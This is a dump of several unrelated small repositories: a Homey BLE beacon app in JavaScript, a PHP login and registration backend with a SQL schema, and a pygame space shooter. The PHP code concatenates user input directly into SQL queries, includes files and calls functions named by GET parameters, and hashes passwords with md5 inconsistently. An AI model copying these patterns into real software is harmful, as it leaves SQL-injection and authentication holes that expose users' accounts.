const beacons = BeaconManager.getCurrentBeacons();
return Object.keys(beacons)
.map(id => { return {
name: beacons[id].type,
data: {id},
}});
}
static async discover(update) {
update = update || ( () => {} );
let result = [];
const updateBeacons = () => {
result = this.fetchBeacons()
update(result);
};
updateBeacons();
BeaconManager.on('join', updateBeacons);
BeaconManager.on('leave', updateBeacons);
return new Promise((resolve) => {
setTimeout(() => {
BeaconManager.removeListener('join', updateBeacons);
BeaconManager.removeListener('leave', updateBeacons);
resolve(result);
}, 15000); //TODO: just keep looking while the window is open
});
}
}
module.exports = BeaconDriver;<file_sep>'use strict';
const Beacon = require('../Beacon');
const util = require('../util');
class Eddystone extends Beacon {
constructor(id, {namespace, instance, measuredPower}) {
super();
this._uniqueId = id;
this._namespace = namespace;
this._instance = instance;
this._measuredPower = measuredPower;
}
get type() {
return Beacon.types.EDDYSTONE;
}
get uniqueId() {
return this._uniqueId;
}
getProximity(monitor) {
let rssi = this.getRSSI(monitor);
let accuracy = Math.pow(12.0, 1.5 * ((rssi / this.measuredPower) - 1));
if (typeof rssi === 'undefined' || accuracy < 0) {
return 'unknown';
} else if (accuracy < 0.5) {
return 'immediate';
} else if (accuracy < 4.0) {
return 'near';
} else {
return 'far';
}
}
get namespace() {
return this._namespace;
}
get instance() {
return this._instance;
}
get measuredPower() {
return this._measuredPower;
}
}
module.exports = Eddystone;<file_sep>'use strict';
const {EventEmitter} = require('events');
const {delay} = require('../../lib/util');
const MQTTManager = require('../../lib/MQTTManager');
const MQTT_TOPICS = [
'happy-bubbles/ble/{hostname}/ibeacon/+',
'happy-bubbles/ble/{hostname}/eddystone/+',
];
const MQTT_DISCOVER_TOPIC = 'happy-bubbles/ble/#';
class HappyBubblesClient extends EventEmitter {
constructor({mqttId, hostname}) {
super();
this._mqttId = mqttId;
this._hostname = hostname;
this._onMessage = this._onMessage.bind(this);
}
/**
* Connects to the bleacon proxy
*/
async connect() {
await this.disconnect();
this._client = await MQTTManager.getConnection(this._mqttId);
this._client.on('message', this._onMessage);
return await this._client.subscribe(MQTT_TOPICS.map(topic => topic.replace('{hostname}', this._hostname)));
}
async disconnect() {
if(!this._client) return;
this._client.removeListener('message', this._onMessage);
return await this._client.unsubscribe(MQTT_TOPICS.map(topic => topic.replace('{hostname}', this._hostname)));
}
_onMessage(topic, message) {
const parts = topic.split('/');
const hostname = parts[2];
if(this._hostname !== hostname) return;
const type = parts[3];
switch(type) {
case 'ibeacon':
this._onIBeacon(JSON.parse(message.toString()));
break;
case 'eddystone':
this._onEddystone(JSON.parse(message.toString()));
break;
default:
break;
}
}
_onIBeacon(beacon) {
this.emit('discover_ibeacon', beacon);
}
_onEddystone(beacon) {
this.emit('discover_eddystone', beacon);
}
/**
* Scans for <timeout>ms and calls enumerate whenever a new device is discovered.
* Resolves with an array of discovered devices
* @param {number} timeout - time to scan for
* @param {function} enumerate callback (gets called multiple times
*/
static async discover(mqttId, timeout, enumerate) {
enumerate = enumerate || ( () => {} );
const hostnames = [];
const client = await MQTTManager.getConnection(mqttId);
await client.subscribe(MQTT_DISCOVER_TOPIC);
const onMessage = (topic, message) => {
topic = topic.replace(/^happy-bubbles\/ble\//, '');
topic = topic.split('/').shift();
if(hostnames.indexOf(topic) < 0) {
hostnames.push(topic);
enumerate(topic);
}
};
client.on('message', onMessage);
await delay(timeout);
client.removeListener('message', onMessage);
await client.unsubscribe(MQTT_DISCOVER_TOPIC);
return hostnames;
}
}
module.exports = HappyBubblesClient;<file_sep>'use strict';
class Util {
static iBeaconUniqueId(uuid, major, minor) {
return ['ibeacon', uuid.replace('-','').trim(), major, minor].join('-').toLowerCase();
}
static eddystoneUniqueId(uuid, major, minor) {
//TODO
return ['eddystone', uuid.replace('-','').trim(), major, minor].join('-').toLowerCase();
}
static async delay(timeout) {
return new Promise((resolve) => {
setTimeout(resolve, timeout);
});
}
}
module.exports = Util;<file_sep>'use strict';
const {Driver} = require('homey');
class MonitorDriver extends Driver {
getDeviceByMonitorId(id) {
return this.getDevices().filter(dev => dev.monitorID === id).pop();
}
}
module.exports = MonitorDriver;<file_sep>'use strict';
const Homey = require('homey');
const BeaconManager = require('./lib/BeaconManager');
class BLEBeaconApp extends Homey.App {
onInit() {
this.log('BLEBeaconApp is running...');
}
}
module.exports = BLEBeaconApp; | b00a17f7c019aef4af12eb77b2e056d7c0ad1260 | [
"Markdown",
"JavaScript"
] | 14 | Markdown | Dijker/nl.vollenbrock.beacons | 614ab580e1bab4f3e3256c3755ba1fb60169d18b | 22d9ae5e0cf45704a3d9c4acebe5805af8c3b579 |
refs/heads/master | <repo_name>ddloo/flowers<file_sep>/php/Link/LoginUser.php
<?php
include_once('LinkSql.php');
class LoginUser extends LinkSql{
//连接数据库
public function __construct()
{
parent::__construct();
}
//判断用户名是否存在
public function usernameIsExist($username){
$result = $this->query('select `username` from `user` where `username` = "'.$username.'"');
if($result->num_rows === 0){
//用户不存在
return 0;
}
return 1;
}
//判断邮箱是否存在
public function emailIsExist($email){
$result = $this->query('select `email` from `user` where `email` = "'.$email.'"');
if($result->num_rows === 0){
//用户不存在
return 0;
}
return 1;
}
//判断用户输入账号密码是否错误
public function auth($keyword, $password, $isUsername){
$userExist = NULL;
$type = NULL;
// die(var_dump($isUsername));
if($isUsername === "true"){
$userExist = $this->usernameIsExist($keyword);
if($userExist === 0){
//用户名不存在
return 0;
}
$type = 'username';
}
else{
$userExist = $this->emailIsExist($keyword);
if($userExist === 0){
//邮箱不存在
return 1;
}
$type = 'email';
}
$result = $this->query('select * from `user` where `password` = "'.$password.'" and `'.$type.'` = "'.$keyword.'"');
//查询错误
if(!$result){
return 2;
}
else if($result->num_rows !== 0){
$userMessage = $result->fetch_assoc();
return $userMessage;
}
//账号或者密码错误
return 3;
}
}<file_sep>/php/Link/RegisterUser.php
<?php
include_once('LinkSql.php');
class RegisterUser extends LinkSql{
//连接数据库
public function __construct()
{
parent::__construct();
}
//判断用户是否已被注册
public function usernameIsExist($username){
$result = $this->query('select `username` from `user` where `username` = "'.$username.'"');
if($result->num_rows === 0){
//用户不存在
return 0;
}
return 1;
}
//判断邮箱是否已被注册
public function emailIsExist($email){
$result = $this->query('select `email` from `user` where `email` = "'.$email.'"');
if($result->num_rows === 0){
//用户不存在
return 0;
}
return 1;
}
//用户注册
public function registerUser($username, $email, $password){
$isUsername = $this->usernameIsExist($username);
$isEmail = $this->emailIsExist($email);
if ($isUsername === 0 && $isEmail === 0){
$password = md5($password);
$userRegister = $this->query('insert into `user` (`username` , `password`, `email`)
values ("'.$username.'", "'.$password.'","'.$email.'")');
return 0;
}
else if($isUsername === 1){
//用户名已经存在
return 1;
}
else if($isEmail === 1){
//邮箱已经存在
return 2;
}
}
}
<file_sep>/php/Handle/UserHandle.php
<?php
//用户登录
function auth(){
$response = [];
if(!isset($_POST['keyword'], $_POST['password'], $_POST['isUsername'])){
$response = [
'code' => '1000',
'msg' => '发生了某些未知错误,请联系网站管理员┭┮﹏┭┮'
];
die(json_encode($response));
}
include_once (app::$base."/Link/LoginUser.php");
$login = new LoginUser();
//登录操作
$result = $login->auth($_POST['keyword'], $_POST['password'], $_POST['isUsername']);
// die($result);
if($result === 0){
//用户不存在
$response = [
'code' => '0001',
'msg' => '该用户名不存在呢o_o ...'
];
die(json_encode($response));
}
else if($result === 1){
//用户不存在
$response = [
'code' => '0001',
'msg' => '该邮箱不存在呢o_o ...'
];
die(json_encode($response));
}
else if($result === 2){
//服务器可能发生错误
$response = [
'code' => '2000',
'msg' => '发生了未知错误,请联系网站管理员QAQ'
];
die(json_encode($response));
}
else if($result === 3){
//账号或者密码错误
$response = [
'code' => '0002',
'msg' => '账号或者密码错误的话>﹏<'
];
die(json_encode($response));
}
else{
//登录成功
session_start();
$_SESSION['uid'] = $result['uid'];
setcookie('uid', $_SESSION['uid'], time() + 60 * 60 * 24 * 1, '/');
$response = [
'code' => '0000',
'msg' => '登录成功',
'data' => [
'username' => $result['username'],
'uid' => $result['uid']
]
];
die(json_encode($response));
}
}
//用户注册
function register(){
$response = [];
if(!isset($_POST['username'], $_POST['password'], $_POST['email'])){
$response = [
'code' => '1000',
'msg' => '发生了某些不可告人的错误呢┭┮﹏┭┮'
];
die(json_encode($response));
}
include_once(app::$base.'/Link/RegisterUser.php');
$register = new RegisterUser();
//注册操作
$result = $register->registerUser($_POST['username'], $_POST['email'], $_POST['password']);
if($result === 1){
//用户名已经被注册
$response = [
"code" => "0001",
"msg" => "该用户名已经被注册啦::>_<::"
];
die(json_encode($response));
}
else if($result === 2){
//邮箱已经被注册
$response = [
"code" => "0002",
"msg" => "该邮箱已经被注册啦::>_<::"
];
die(json_encode($response));
}
else{
//注册成功
$response = [
"code" => "0000",
"msg" => "注册成功^o^"
];
die(json_encode($response));
}
}<file_sep>/php/Link/LinkSql.php
<?php
//封装连接数据库类
class LinkSql extends mysqli{
private $host = "";
private $port = "";
private $db = "";
private $admin = "";
private $password = "";
public $isLinkSql = false;
public function __construct(){
$this->host = app::$host;
$this->port = app::$port;
$this->db = app::$db;
$this->admin = app::$admin;
$this->password = app::$<PASSWORD>;
parent::__construct($this->host, $this->admin, $this->password, $this->db, $this->port);
if(!$this->connect_error){
$this->set_charset("utf8");
$this->isLinkSql = true;
}
}
}<file_sep>/florist.sql
-- phpMyAdmin SQL Dump
-- version 4.8.5
-- https://www.phpmyadmin.net/
--
-- 主机: 127.0.0.1
-- 生成日期: 2019-11-11 00:14:53
-- 服务器版本: 10.1.38-MariaDB
-- PHP 版本: 7.3.3
SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
SET AUTOCOMMIT = 0;
START TRANSACTION;
SET time_zone = "+00:00";
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
--
-- 数据库: `florist`
--
-- --------------------------------------------------------
--
-- 表的结构 `user`
--
CREATE TABLE `user` (
`uid` int(11) NOT NULL,
`username` varchar(50) NOT NULL,
`password` varchar(30) NOT NULL,
`email` varchar(50) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
--
-- 转存表中的数据 `user`
--
INSERT INTO `user` (`uid`, `username`, `password`, `email`) VALUES
(1, 'ddloo', '<PASSWORD>', '<PASSWORD> <EMAIL>'),
(2, '444', '<PASSWORD>', '<EMAIL>');
--
-- 转储表的索引
--
--
-- 表的索引 `user`
--
ALTER TABLE `user`
ADD PRIMARY KEY (`uid`);
--
-- 在导出的表使用AUTO_INCREMENT
--
--
-- 使用表AUTO_INCREMENT `user`
--
ALTER TABLE `user`
MODIFY `uid` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;
COMMIT;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
<file_sep>/php/entrance.php
<?php
//入口文件
class app{
public static $host = "localhost";
public static $port = "3306";
public static $db = "florist";
public static $admin = "root";
public static $password = "";
public static $base = __DIR__;
}
$handle = $_GET['handle'];
$method = $_GET['method'];
include_once(app::$base."/Handle/".$handle.".php");
$method(); | 192cc8d2d9bf97f3b2ce3b835f1edf092172a22b | [
"SQL",
"PHP"
] | 6 | PHP | ddloo/flowers | 7c716d418e4975c7a5f8fd181edab5f6ea4cfdf6 | ea7dea9a8b53e9be5b2f4ad68692a93cc052ca3c |
refs/heads/master | <repo_name>kalug89/NewWeatherApp<file_sep>/app/src/main/java/com/dkaluzny/newweatherapp/ui/details/DetailsFragment.kt
package com.dkaluzny.newweatherapp.ui.details
import android.os.Bundle
import android.util.Log
import android.view.LayoutInflater
import android.view.View
import android.view.ViewGroup
import androidx.fragment.app.Fragment
import androidx.lifecycle.ViewModelProviders
import kotlinx.android.synthetic.main.details_fragment.*
class DetailsFragment : Fragment() {
}
<file_sep>/settings.gradle
include ':app'
rootProject.name='NewWeatherApp'
<file_sep>/app/src/main/java/com/dkaluzny/newweatherapp/ui/details/DetailsViewModel.kt
package com.dkaluzny.newweatherapp.ui.details
import androidx.lifecycle.ViewModel
class DetailsViewModel: ViewModel(){
}<file_sep>/app/src/main/java/com/dkaluzny/newweatherapp/ui/dashboard/DashboardFragment.kt
package com.dkaluzny.newweatherapp.ui.dashboard
import android.os.Bundle
import android.view.LayoutInflater
import android.view.View
import android.view.ViewGroup
import androidx.fragment.app.Fragment
import com.dkaluzny.newweatherapp.R
class DashboardFragment : Fragment() {
private lateinit var viewModel: DashboardViewModel
override fun onCreateView(
inflater: LayoutInflater,
container: ViewGroup?,
savedInstanceState: Bundle?
): View? {
return inflater.inflate(
R.layout.dashboard_fragment, container, false
)
}
}
<file_sep>/app/src/main/java/com/dkaluzny/newweatherapp/ui/dashboard/DashboardViewModel.kt
package com.dkaluzny.newweatherapp.ui.dashboard
import androidx.lifecycle.ViewModel
class DashboardViewModel : ViewModel()<file_sep>/app/src/main/java/com/dkaluzny/newweatherapp/ui/error/ErrorViewModel.kt
package com.dkaluzny.newweatherapp.ui.error
import androidx.lifecycle.ViewModel
class ErrorViewModel: ViewModel(){
}<file_sep>/app/src/main/java/com/dkaluzny/newweatherapp/ui/error/ErrorFragment.kt
package com.dkaluzny.newweatherapp.ui.error
import android.os.Bundle
import android.view.LayoutInflater
import android.view.View
import android.view.ViewGroup
import androidx.fragment.app.Fragment
import androidx.lifecycle.ViewModelProviders
import kotlinx.android.synthetic.main.error_fragment.*
class ErrorFragment : Fragment() {
}
<file_sep>/app/src/main/java/com/dkaluzny/newweatherapp/ui/MainActivity.kt
package com.dkaluzny.newweatherapp.ui
import android.os.Bundle
import androidx.appcompat.app.AppCompatActivity
import com.dkaluzny.newweatherapp.R
import com.dkaluzny.newweatherapp.ui.dashboard.DashboardFragment
class MainActivity : AppCompatActivity() {
override fun onCreate(savedInstanceState: Bundle?) {
super.onCreate(savedInstanceState)
setContentView(R.layout.activity_main)
if (savedInstanceState == null) {
supportFragmentManager.beginTransaction().replace(R.id.root, DashboardFragment()
).commit()
}
}
}
/*
Zadanie polega na stworzeniu prostej aplikacji do sprawdzania prognozy pogody z wykorzystaniem darmowej usługi np.
http://apidev.accuweather.com/developers/ lub http://openweathermap.org/api lub dowolnej innej, wybranej przez kandydata, która udostępnia publiczne API.
Wymagania funkcjonalne:
● na pierwszym widoku można podać miasto dla którego chce się wyszukać prognozę pogody (google places API, SDK Android (validacja miasta))
● po pobraniu prognozy pogody dla podanego miasta ma nastąpić nawigacja do nowego widoku ze szczegółami prognozy,
● ilość szczegółów prognozy pogody na ekranie szczegółowym jest dowolna. Może być np. temperatura aktualna, stan zachmurzenia, możliwość opadów, tabelka z temperaturami na najbliższe godziny itd. w zależności co uda się pobrać z usługi,
● kolor czcionki temperatury ma różnić się w zależności od stopni -> poniżej 10 stopni kolor niebieski, między 10 a 20 stopni kolor czarny, powyżej 20 kolor czerwony.
Notatki.
- Do pobierania API - retrofit
*/
/*Notatki:
https://csform.com/product/matta-material-ui-kit/
https://lh3.googleusercontent.com/N2wLODwPww0RRlNQqvrmAS0pN4B64Dwai5_1txGAnEtvnhi2qyASsbsiNKbv-cIuWQ
*/ | 168afd7ddc6b80439cf44108c9631c6e73ace643 | [
"Kotlin",
"Gradle"
] | 8 | Kotlin | kalug89/NewWeatherApp | 38b44340b6d99e8e6f908a17a0c68ea784325155 | 61155585725cfebeb1dd56563dadd14bb4e2e9c0 |
refs/heads/master | <file_sep><?php
namespace AppBundle\Class;
<file_sep><?php
use Doctrine\ORM\Mapping\ClassMetadataInfo;
$metadata->setInheritanceType(ClassMetadataInfo::INHERITANCE_TYPE_NONE);
$metadata->setPrimaryTable(array(
'name' => 'Lesson',
));
$metadata->setChangeTrackingPolicy(ClassMetadataInfo::CHANGETRACKING_DEFERRED_IMPLICIT);
$metadata->mapField(array(
'fieldName' => 'id',
'columnName' => 'id',
'type' => 'integer',
'nullable' => false,
'options' =>
array(
'unsigned' => false,
),
'id' => true,
));
$metadata->mapField(array(
'fieldName' => 'nom',
'columnName' => 'nom',
'type' => 'string',
'nullable' => true,
'length' => 100,
'options' =>
array(
'fixed' => false,
),
));
$metadata->mapField(array(
'fieldName' => 'description',
'columnName' => 'description',
'type' => 'string',
'nullable' => true,
'length' => 100,
'options' =>
array(
'fixed' => false,
),
));
$metadata->mapField(array(
'fieldName' => 'nombreInscrit',
'columnName' => 'nombre_inscrit',
'type' => 'integer',
'nullable' => true,
'options' =>
array(
'unsigned' => false,
),
));
$metadata->mapField(array(
'fieldName' => 'horraireDebut',
'columnName' => 'horraire_debut',
'type' => 'date',
'nullable' => true,
));
$metadata->mapField(array(
'fieldName' => 'horraireFin',
'columnName' => 'horraire_fin',
'type' => 'date',
'nullable' => true,
));
$metadata->setIdGeneratorType(ClassMetadataInfo::GENERATOR_TYPE_IDENTITY);<file_sep><?php
namespace AppBundle\Entity;
use Doctrine\ORM\Mapping as ORM;
/**
* Lesson
*
* @ORM\Table(name="Lesson")
* @ORM\Entity
*/
class Lesson
{
/**
* @var string
*
* @ORM\Column(name="nom", type="string", length=100, nullable=true)
*/
private $nom;
/**
* @var string
*
* @ORM\Column(name="description", type="string", length=100, nullable=true)
*/
private $description;
/**
* @var integer
*
* @ORM\Column(name="nombre_inscrit", type="integer", nullable=true)
*/
private $nombreInscrit;
/**
* @var \DateTime
*
* @ORM\Column(name="horraire_debut", type="date", nullable=true)
*/
private $horraireDebut;
/**
* @var \DateTime
*
* @ORM\Column(name="horraire_fin", type="date", nullable=true)
*/
private $horraireFin;
/**
* @var integer
*
* @ORM\Column(name="id", type="integer")
* @ORM\Id
* @ORM\GeneratedValue(strategy="IDENTITY")
*/
private $id;
/**
* Set nom
*
* @param string $nom
*
* @return Lesson
*/
public function setNom($nom)
{
$this->nom = $nom;
return $this;
}
/**
* Get nom
*
* @return string
*/
public function getNom()
{
return $this->nom;
}
/**
* Set description
*
* @param string $description
*
* @return Lesson
*/
public function setDescription($description)
{
$this->description = $description;
return $this;
}
/**
* Get description
*
* @return string
*/
public function getDescription()
{
return $this->description;
}
/**
* Set nombreInscrit
*
* @param integer $nombreInscrit
*
* @return Lesson
*/
public function setNombreInscrit($nombreInscrit)
{
$this->nombreInscrit = $nombreInscrit;
return $this;
}
/**
* Get nombreInscrit
*
* @return integer
*/
public function getNombreInscrit()
{
return $this->nombreInscrit;
}
/**
* Set horraireDebut
*
* @param \DateTime $horraireDebut
*
* @return Lesson
*/
public function setHorraireDebut($horraireDebut)
{
$this->horraireDebut = $horraireDebut;
return $this;
}
/**
* Get horraireDebut
*
* @return \DateTime
*/
public function getHorraireDebut()
{
return $this->horraireDebut;
}
/**
* Set horraireFin
*
* @param \DateTime $horraireFin
*
* @return Lesson
*/
public function setHorraireFin($horraireFin)
{
$this->horraireFin = $horraireFin;
return $this;
}
/**
* Get horraireFin
*
* @return \DateTime
*/
public function getHorraireFin()
{
return $this->horraireFin;
}
/**
* Get id
*
* @return integer
*/
public function getId()
{
return $this->id;
}
}
| 3e9fdfed4aa461dab044870ee344274db2c611d6 | [
"PHP"
] | 3 | PHP | Velk/musquash | 946380a5666c626a881911898056dfc526954aeb | 17fa3c886fa36723686e6041817b9ec7813d5e56 |
refs/heads/master | <repo_name>beenish-mha/Password-Generator<file_sep>/README.md
# Password-Generator
Making this app to generate a random password for the users.
The app can create a strong password that provides greater security.
User can enter its special chracter, numbers , lowercase and uppercase alphabet
and with the click of a button it will generate a new unique password
Copying the random password into the clipboard.<file_sep>/script.js
var generatePassword = document.querySelector(".generatepassword");
var copyToClipboard = document.querySelector(".clipboard");
var yourSecurePassword = document.querySelector(".yoursecurepassword.value");
var specialCheck = /[" !"#$£%&'()*+,-./:;<=>?@[\]^_`{|}~"]+/;
var numbCheck = /[0123456789]/;
var lAlCheck = /[abcdefghijklmnopqrstuvwxyz]/;
var uAlCheck = /[ABCDEFGHIJKLMNOPQRSTUVWXYZ]/;
var specialChar;
var numb;
var lAlpha;
var uAlpha;
var passwordArray = [];
//function to ckeck the special chracter entered and pushing into password array!
function checkSpecial() {
specialChar = prompt('Check your Special Charater and try again');
sc = specialCheck.test(specialChar);
if (sc === false) {
checkSpecial();
}
else {
passwordArray.push(specialChar);
return;
}
}
//function to check the number entered and pushing into password array!
function checkNumb() {
numb = prompt('Check your Number entry and try again');
nc = numbCheck.test(numb);
if (nc === false) {
checkNumb();
}
else {
passwordArray.push(numb);
return;
}
}
//function to check the lower case alphabet and pushing into password array!
function checkLalpha() {
lAlpha = prompt('Please check the lower case entry and try again');
var lac = lAlCheck.test(lAlpha);
if (lac === false) {
checkLalpha();
}
else {
passwordArray.push(lAlpha);
return;
}
}
// function to check the upper case alphabet and pushing into password array!
function checkUalpha() {
uAlpha = prompt('Please check the Upper case entry and try again');
var uac = uAlCheck.test(uAlpha);
if (uac === false) {
checkUalpha();
}
else {
passwordArray.push(uAlpha);
return;
}
}
//function to creat a random password generating with the user input.
function radomPassword(passwordArray) {
var i, x, j;
var arrayLength = passwordArray.length;
for (i = 0; i < arrayLength; i++) {
j = Math.floor(Math.random() * arrayLength);
x = passwordArray[i];
passwordArray[i] = passwordArray[j];
passwordArray[j] = x;
}
return passwordArray;
}
//displaying random password on the page.
function showPassword() {
var newPass = radomPassword(passwordArray);
newPassword = newPass.join("");
document.inputform.txt.value = newPassword;
event.preventDefault();
}
//calling generate button.
generatePassword.addEventListener("click", function () {
alert("length of your password must b between 8 and 128");
//checking user enrty and pusing in an array
specialChar = prompt('Enter any special characters');
if (specialChar === null) {
return;
}
var sc = specialCheck.test(specialChar);
if (sc === false) {
checkSpecial();
}
else {
passwordArray.push(specialChar);
}
numb = prompt('Enter any numbers');
if (numb === null) {
return;
}
var nc = numbCheck.test(numb);
if (nc === false) {
checkNumb();
}
else {
passwordArray.push(numb);
}
lAlpha = prompt('Enter any lower case alpabet');
if (lAlpha === null) {
return;
}
var lac = lAlCheck.test(lAlpha);
if (lac === false) {
checkLalpha();
}
else {
passwordArray.push(lAlpha);
}
uAlpha = prompt('Enter any uppercase alphabet');
if (uAlpha === null) {
return;
}
var uac = uAlCheck.test(uAlpha);
if (uac === false) {
checkUalpha();
}
else {
passwordArray.push(uAlpha);
}
//check the length of array.
var newP = passwordArray.join("");
if (newP.length < 8 || newP.length > 128) {
alert ("please check the length of your password and try again");
}
else {
//calling the function which show result in the readonly text-box.
showPassword();
}
})
//calling copy on clipboard button
copyToClipboard.addEventListener("click", function () {
var copyText = document.inputform.txt.value;
// using the Clipboard API.
navigator.clipboard.writeText(copyText).then();
alert(copyText + " " + "is been added to your clipboard");
})
| f0dbff56abc849fd5434d3ab185e3fffb5ca2afc | [
"Markdown",
"JavaScript"
] | 2 | Markdown | beenish-mha/Password-Generator | 286bc7a2de1c586a97e0d38bb8382fc2f89cc860 | 36736da043d4f4d09d69340b8feb1ded9206b56e |
refs/heads/main | <file_sep># GRA
Granger-<NAME>
Used to combine vis-NIR and pXRF predictions for improved estimation of soil lead content.
Related paper:
<NAME>., <NAME>., <NAME>. and <NAME>., 2020. Integration of vis-NIR and pXRF spectroscopy for rapid measurement of soil lead concentrations. Soil Research, 58(3), pp.247-257.
GRA theory:
<NAME>, <NAME> (1984). Improved methods of combining forecasts. Journal of Forecasting 3(2), 197-204. doi:10.1002/for.3980030207
<file_sep>########################################
## Granger-Ramanathan Model Averaging ##
########################################
# Source: Uta Stockman
# Updated by: <NAME>
# Date: 26/03/21
# Code used for:
# <NAME>., <NAME>., <NAME>. and <NAME>., 2020.
# Integration of vis-NIR and pXRF spectroscopy for rapid measurement of
# soil lead concentrations. Soil Research, 58(3), pp.247-257.
# GRA theory:
# <NAME>, <NAME> (1984). Improved methods of combining forecasts.
# Journal of Forecasting 3(2), 197-204. doi:10.1002/for.3980030207
# In this code averaging with XRF Compton-normalised values with Cubist NIR
rm(list=ls())
setwd(dirname(rstudioapi::getActiveDocumentContext()$path))
load("goof2.RData") # Goodness of fit statistics
##### Read in data #####
Model_aver_c = read.csv("calib.csv")
Model_aver_v = read.csv("valid.csv")
##### Granger-Ramanathan Averaging #####
### Calibration ###
soil_c <- (Model_aver_c$ref_Pb)
# linear regression model
mod.1.c <- lm(Model_aver_c$ref_Pb ~ NIR_bag_mean_Pb + ComptonPb, data=Model_aver_c)
# Call up mod.1.v results to obtain the coefficients:
mod.1.c
weight<-mod.1.c$coefficients
wo<-weight[1]
w_nir<-weight[2]
w_xrf<-weight[3]
# (intercept), NIR_bag_mean_Pb, XRF_bag_mean_rawPb
# These are Wo, W_NIR and W_xrf, respectively
# Note W_NIR and W_XRF do not sum to 1.
# Model averaged predicted Y;
# Y = Wo + (W_nir.X_nir)+(W_xrf.X_xrf)
Y_cal= wo + (w_nir*(Model_aver_c$NIR_bag_mean_Pb)) + (w_xrf*(Model_aver_c$ComptonPb))
#write.csv(cbind(Model_aver_c$ref_Pb, Y_cal), file=export_calib)
isrow <- complete.cases(Y_cal) # find which row has complete record (no NA values)
soil_c <- soil_c[isrow] #specify type of spectra to use for prediction
Y_cal <- Y_cal[isrow] # this represents the soil variable without missing values
gfc.mod.1._predict <- goof2(soil_c, Y_cal)
### Validation ###
#Model
mod.1.v <- lm(Model_aver_v$ref_Pb ~ NIR_bag_mean_Pb+ComptonPb, data=Model_aver_v)
mod.1.v
weight<-mod.1.v$coefficients
wo_v<-weight[1]
w_nir_v<-weight[2]
w_xrf_v<-weight[3]
Y_val= wo_v + (w_nir_v*(Model_aver_v$NIR_bag_mean_Pb)) + (w_xrf_v *(Model_aver_v$ComptonPb))
#write.csv(cbind(Model_aver_v$ref_Pb, Y_val), file=export_valid)
gfv.mod.1._predict <- goof2(Model_aver_v$ref_Pb, Y_val)
gfc.mod.1._predict
gfv.mod.1._predict
| 5de39e79c72747a038f8b177758d98e87817abd4 | [
"Markdown",
"R"
] | 2 | Markdown | lpoz/GRA | a2e81f877cd613e5947e5d2cc25aa6c1eca212d1 | 0d8958aa0e0c4c5c44965698cf7663ce8669d2a8 |
refs/heads/master | <repo_name>Dulet/shmup<file_sep>/star.py
import pygame
from pygame.sprite import Sprite
import random
class Star(Sprite):
    """A background star sprite that scrolls down the screen as decoration."""
    def __init__(self, ai_settings, screen, images):
        """Spawn the star at a random x, 1-4 screen heights above the top edge."""
        super(Star, self).__init__()
        self.screen = screen
        self.ai_settings = ai_settings
        self.image = images.star
        self.rect = self.image.get_rect()
        # Random horizontal position anywhere across the screen width.
        self.rect.x = random.randint(0, ai_settings.screen_width)
        self.rect.y = random.randint(-4 * ai_settings.screen_height,
            -1 * ai_settings.screen_height)
        # Upper bound for this star's fall speed.
        self.stars_speed = ai_settings.max_stars_speed
        # Float copies of the position allow sub-pixel per-frame movement.
        self.x = float(self.rect.x)
        self.y = float(self.rect.y)
        self.speed = random.uniform(1, self.stars_speed)
    def blitme(self):
        """Draw the star at its current position."""
        self.screen.blit(self.image, self.rect)
    def update(self):
        """Drift the star downward by its per-frame speed."""
        self.y += self.speed
self.rect.y = self.y<file_sep>/powerup.py
import pygame
from pygame.sprite import Sprite
import random
# Powerup kinds that can drop; paired element-wise with `weights` below.
powerups = ['autofire', 'pierce', 'bullet', 'speed', "double", "triple"] # bullet for manual button pressing
# Relative spawn weights for random.choices; the 0 disables 'bullet' drops.
weights = [1, 2, 0, 2, 1, 0.7]
class Powerup(Sprite):
    """A falling pickup whose effect is drawn at random from the module tables."""
    def __init__(self, ai_settings, screen, images):
        """Spawn a random powerup at a random x, above the visible screen."""
        super(Powerup, self).__init__()
        self.screen = screen
        self.ai_settings = ai_settings
        # NOTE: random.choices returns a one-element list, so consumers
        # (e.g. powerup_check) read self.type[0].
        self.type = random.choices(powerups, weights, k=1)
        print(self.type)
        self.image = images.powerup_images[self.type[0]]
        self.rect = self.image.get_rect()
        self.rect.x = random.randint(0, ai_settings.screen_width)
        self.rect.y = random.randint(-4 * ai_settings.screen_height,
            -1 * ai_settings.screen_height)
        # Fall speed is capped by the same setting used for stars.
        self.stars_speed = ai_settings.max_stars_speed
        # Float copies of the position allow sub-pixel per-frame movement.
        self.x = float(self.rect.x)
        self.y = float(self.rect.y)
        self.speed = random.uniform(1, self.stars_speed)
    def blitme(self):
        """Draw the powerup at its current position."""
        self.screen.blit(self.image, self.rect)
    def update(self):
        """Drift the powerup downward by its per-frame speed."""
        self.y += self.speed
self.rect.y = self.y<file_sep>/alien_invasion.py
import pygame
from settings import Settings
from ship import Ship
from pygame.sprite import Group
from game_stats import GameStats
from button import Button
from scoreboard import Scoreboard
from counter import Counter
from sounds import Sounds
from images import Images
import game_functions as gf
class Background(pygame.sprite.Sprite):
    """Full-screen background image sprite.

    NOTE(review): appears unused — run_game never instantiates it and the
    blit call referencing it is commented out; confirm before removing.
    """
    def __init__(self, image_file, location):
        pygame.sprite.Sprite.__init__(self)
        self.image = pygame.image.load(image_file)
        self.rect = self.image.get_rect()
        # Anchor the image's top-left corner at the given (x, y) location.
        self.rect.left, self.rect.top = location
def run_game():
    """Initialize pygame, build all game objects, and run the main loop forever."""
    # Pre-initialize the mixer before pygame.init() for low-latency audio.
    pygame.mixer.pre_init(44100, -16, 16, 2048)
    pygame.mixer.init()
    pygame.init()
    ai_settings = Settings()
    screen = pygame.display.set_mode(
        (ai_settings.screen_width, ai_settings.screen_height))
    pygame.display.set_caption("Alien Invasion")
    play_button = Button(ai_settings, screen, "Play")
    # Shared resources and sprite groups.
    sounds = Sounds()
    images = Images()
    bullets = Group()
    aliens = Group()
    stars = Group()
    powerups = Group()
